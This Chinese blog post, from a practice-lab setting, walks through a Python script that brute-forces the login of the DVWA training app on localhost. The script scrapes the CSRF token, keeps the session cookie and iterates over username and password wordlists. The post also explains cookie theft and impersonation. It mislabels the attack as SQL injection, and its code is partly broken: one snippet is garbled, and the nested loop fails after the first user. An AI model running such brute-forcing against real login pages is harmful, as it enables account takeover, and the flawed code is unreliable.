Python — 获取数据库的用户名密码

最新推荐文章于 2023-10-02 17:42:46 发布
最新推荐文章于 2023-10-02 17:42:46 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: Python应用 文章标签: python 脚本语言 cookie session 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/117264681
版权

Python — 获取数据库的用户名密码

Python — 获取数据库的用户名密码

1.sql注入脚本编程思路

构造一个合法的session,让服务器信任

1. 设法知道token值
2. 设法知道cookie值

2.具体步骤

  1. python脚本借助浏览器非法访问服务器,得到服务器的响应,登录失败,原因是没有token和cookie值

  2. 设法获取token值。通过正则表达式的方式

     req=requests.session()
 reqs = req.get(url=url).text
 a = re.findall("<input type='hidden' name='user_token' 
 '''a是一个数组'''
 value='(.*?)'", reqs)

 data = {
         'username': user,
         'password': password,
         'Login': 'Login',
         'user_token': a[0]
     }

  3. 获取token之后,再次访问服务器,发现request请求中缺少cookie参数。于是设法获取cookile值。

     req=requests.session()

 responst = req.post(url=url, data=data)
 if 'Login failed' not in responst.text:
     print(user)
     print(password)

  4. 最后在利用for循环的方式,读取字典中的值,进行暴力破解

     f1=open('user.txt','r')       #打开用户名字典
 f2=open('password.txt','r') 
 
 for line in f1:
     user=line.strip()         #逐行读取数据
     for line1 in f2:
         password=line1.strip()

3.cookie和session的联系与区别

3.1 cookie的工作原理

(1)浏览器端第一次发送请求到服务器端

(2)服务器端创建Cookie,该Cookie中包含用户的信息,然后将该Cookie发送到浏览器端

(3)浏览器端再次访问服务器端时会携带服务器端创建的Cookie

(4)服务器端通过Cookie中携带的数据区分不同的用户

3.2 session的工作原理

  1. 浏览器端第一次发送请求给服务器,服务器会创建一个session,同时会创建一个特殊的cookie(name为jsessionid的固定值,value为session对象的id),然后将该cookie发送给浏览器

  2. 后续浏览器访问服务器的时候,就会携带此cookie对象

  3. 服务器端根据浏览器携带的cookie区分不同的用户

    name为JSESSIONID(或value为SessionId) 的Cookie不存在(关闭或更换浏览器),重新去创建Session与特殊的Cookie

    name为JSESSIONID(或value为SessionId)的Cookie存在,根据value:SessionId去寻找session对象

3.3 共同之处

  1. 都是用来跟踪浏览器用户身份的会话方式

3.4 session 与 cookie 的区别

  1. cookie数据保存在客户端,session数据保存在服务端。session的过期取决于服务器,cookie的过期取决于最初设定的时长。

  2. session

    简单的说,当你登陆一个网站的时候,如果web服务器端使用的是session,那么所有的数据都保存在服务器上,客户端每次请求服务器的时候会发送当前会话sessionid,服务器根据当前sessionid判断相应的用户数据标志,以确定用户是否登陆或具有某种权限。由于数据是存储在服务器上面,所以你不能伪造。

  3. cookie

    如果浏览器使用的是cookie,那么所有数据都保存在浏览器端,比如你登陆以后,服务器设置了cookie用户名,那么当你再次请求服务器的时候,浏览器会将用户名一块发送给服务器,这些变量有一定的特殊标记。服务器会解释为cookie变量,所以只要不关闭浏览器,那么cookie变量一直是有效的,所以能够保证长时间不掉线。

    如果能截取某个用户的cookie变量,然后伪造一个数据包发送过去,就能欺骗服务器

    所以你在机器上面保存了某个论坛cookie,有效期是一年,如果有人入侵你的机器,将你的cookie拷走,放在他机器下面,那么他登陆该网站的时候就是用你的身份登陆的。当然,伪造的时候需要注意,直接copy cookie文件到 cookie目录,浏览器是不认的,他有一个index.dat文件,存储了 cookie文件的建立时间,以及是否有修改,所以你必须先要有该网站的 cookie文件,并且要从保证时间上骗过浏览器

3. 源码

import requests
import re

#ree=requests.cookies()
req=requests.session()
url='http://127.0.0.1/DVWA-master/login.php'      
f1=open('user.txt','r')        		#打开用户名字典
f2=open('password.txt','r') 

for line in f1:
    user=line.strip()					#逐行读取数据
    for line1 in f2:
        password=line1.strip()			#逐行读取数据
        reqs = req.get(url=url).text
        a = re.findall("<input type='hidden' name='user_token' value='(.*?)'", reqs)  
        #利用正则表达式获取token值;a是一个数组
        data = {
            'username': user,
            'password': password,
            'Login': 'Login',
            'user_token': a[0]
        }
        responst = req.post(url=url,data=data)
        if 'Login failed' not in responst.text:
            print(user)
            print(password)
Buffedon
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Python连接mysql密码用密文_druid配置数据库连接使用密文密码
weixin_30187777的博客
02-11 443
spring使用druid配置dataSource片段代码dataSource配置 jdbc.properties## JDBC setjdbc.url=jdbc\:mysql\://localhost\:3306/edu_demo?useUnicode\=true&characterEncoding\=utf-8jdbc.username=rootjdbc.password=Obsbr...
Python 中的安全密码处理
Java癫疯的博客
11-29 772
Python 中的安全密码处理
使用python连接数据库,并且输入账号密码,根据不同的账号密码,进行不同的功能,目前的功能是爬取图片和小说
Jackey1Love的博客
10-02 222
code_html = requests.get(url,headers=headers) #发送请求。img_path = './day07图片解析-素材/' + img_name。code_html_get = code_html.text #把网页代码文本话。soup = etree.HTML(code_html_get) #把代码爬过来。code_html.encoding='UTF-8' #编码格式为utf- 8。
干货!分享解决python脚本中涉及账号密码泄露的方案(pyarmor)
liwenxiang629的博客
11-14 2711
最近想要解决关于python源码加密的问题,相信这也是许多公司的共性问题。简单地说就是好多测试运维脚本中直接编写了连接各种服务器的代码(包括应用服务器,数据库服务器等等),这是非常不安全的做法!看了一下,目前网上大概的解决方案如下: 1.把.py文件转换为.pyc文件(比较容易破解) 2.将.py编译为.c文件,再将.c文件编译为.so 3. 把py打包成在某一平台的可执行文件,例如生成exe文件 4.代码混淆加密(今天重点介绍)
界面开发(3)--- PyQt5用户登录界面连接数据库
热门推荐
WYKB_Mr_Q的博客
03-02 1万+
上篇文章介绍了如何使用PyQt5制作用户登录界面,这篇文章在此基础上展开,建立简单数据库,实现账号登录、账户注册以及找回密码的功能。
Python获取一个用户名的组ID过程解析
09-18
首先,Python提供了`pwd`模块来处理Unix系统中的密码数据库,其中包含了用户账户的相关信息。我们可以使用`getpwnam()`函数来获取指定用户名的详细信息,包括用户ID(uid)、组ID(gid)和其他属性。例如: ```...
python链接数据库项目练习
最新发布
04-17
Python编程中,链接数据库是一项基础且重要的技能,尤其对于开发数据驱动的应用程序而言。本项目练习主要聚焦于使用Python连接并操作数据库,这通常涉及到Python数据库API接口,如SQLite、MySQL、PostgreSQL等。...
python 连接数据库
09-22
记住,确保在实际应用中遵循最佳安全实践,例如不要在代码中硬编码敏感信息(如用户名密码),而是使用环境变量或配置文件。 2. **连接 PostgreSQL 数据库** 对于 PostgreSQL,Python 社区推荐使用 `psycopg2` ...
python连接数据库的方法
09-21
在这个示例中,`pymysql.connect()`函数用于创建数据库连接,参数包括数据库服务器的地址、用户名密码数据库名、端口号和字符编码。`cursor()`方法用于获取游标,`execute()`方法执行SQL语句,`fetchall()`或`...
Python 操作 MySQL 数据库.docx
01-29
在这里,你需要提供数据库服务器的主机名、用户名密码数据库名以及字符集。 3. 获取游标对象:`cursor = db.cursor()` 游标允许执行SQL语句并获取结果。 4. 执行SQL语句:`cursor.execute("SQL命令")` 如查询...
使用python实现MySQL作为数据存储的登陆,注册和修改密码
12-14
自己在学习pyton时写的一个小程序,实现从MySQL中抽取数据,实现注册和登陆,修改密码等。
python通过配置文件ini,调取数据库登录信息
reborn灬的博客
05-30 201
python通过配置文件ini,调取数据库登录信息
python简单的连接数据库登录界面
明裕学长的博客
03-23 5401
这是我的第二的博客,也是python登录专栏第一期 上期我们讲到连接数据库 那我们怎么查询登录呢? 代码如下 import pymysql #连接数据库 conn = pymysql.connect(host = '127.0.0.1' # 连接名称,默认127.0.0.1 ,user = 'root' # 用户名 ,passwd='root' # 密码 ,port= 3306 # 端口,默认为3306 ,db='user' # 数据库名称 ,charset='utf8' # 字符编码 ) cu.
python连接MySQL数据库实现用户登录校验】
小猪de博客
10-12 1090
python连接MySQL数据库实现用户登录校验
python获取数据库用户名密码_SQLite3从数据库读取用户名密码
weixin_39926540的博客
12-10 1370
我试图使用数据库从中读取有效的登录名。一列是用户名,另一列是密码。如何编写代码,以便如果来自用户的用户名条目和来自用户的密码条目匹配数据库中的一行,它将验证登录并进入下一页,这就是这个例子中的“屏幕”我做了一个演示登录页面下面,我已经添加了一个创建数据库功能。我必须编辑/添加什么来填充我的目标。在from tkinter import * #imports all the GUI librarie...
python调用数据库_python数据库(mysql)操作
weixin_39834149的博客
11-21 215
一、软件环境python环境默认安装了sqlite3,如果需要使用sqlite3我们直接可以在python代码模块的顶部使用import sqlite3来导入该模块。本篇文章我是记录了python操作mysql数据库,由于我之前安装的是wampserver,默认安装了php、mysql和apache这3个环境,因此我没有在单独安装mysql数据库,只是下载了一个mysql管理工具Navicat f...
python获取用户名的几种方法
weixin_42588877的博客
01-17 3333
Python可以使用以下几种方法获取用户名: 使用os.getlogin()函数: 返回当前登录用户的用户名。 使用os.geteuid()函数: 返回当前进程的有效用户ID, 可以使用pwd.getpwuid(uid)将其转换为用户名。 使用getpass.getuser()函数: 返回当前用户的用户名。 使用platform.node()函数: 返回当前系统的主机名, 可能包含用户名。 第...
【针对sqli-labs第9关的时间盲注python脚本】
AA8j的博客
09-09 706
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
python数据库连接密码加密_Python密码加密与解密
weixin_39683025的博客
11-30 2724
Python实现加密解密最近在搞一个web应用的密码管理模块,里面用到了python密码的加密解密模块,在网上搜了一下,发现这方面的加密解密例子还比较多,整理了一下思路,初步将密码管理的逻辑思路确定如下:先来解释这一部分,该部分是把需要加密的密码存放在后端数据库的指定表中,该表至少包含三个字段,即明文密码password、加密串(密钥)passwd_randstr以及加密后的密码auth_pas...
python连接Neo4j数据库用户名密码从哪获取
05-30
Python中连接Neo4j数据库时,需要提供数据库用户名密码。这些信息通常存储在Neo4j数据库配置文件中,该文件位于Neo4j安装目录下的conf目录中。默认情况下,用户名为"neo4j",密码为"neo4j"。您可以在该配置...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值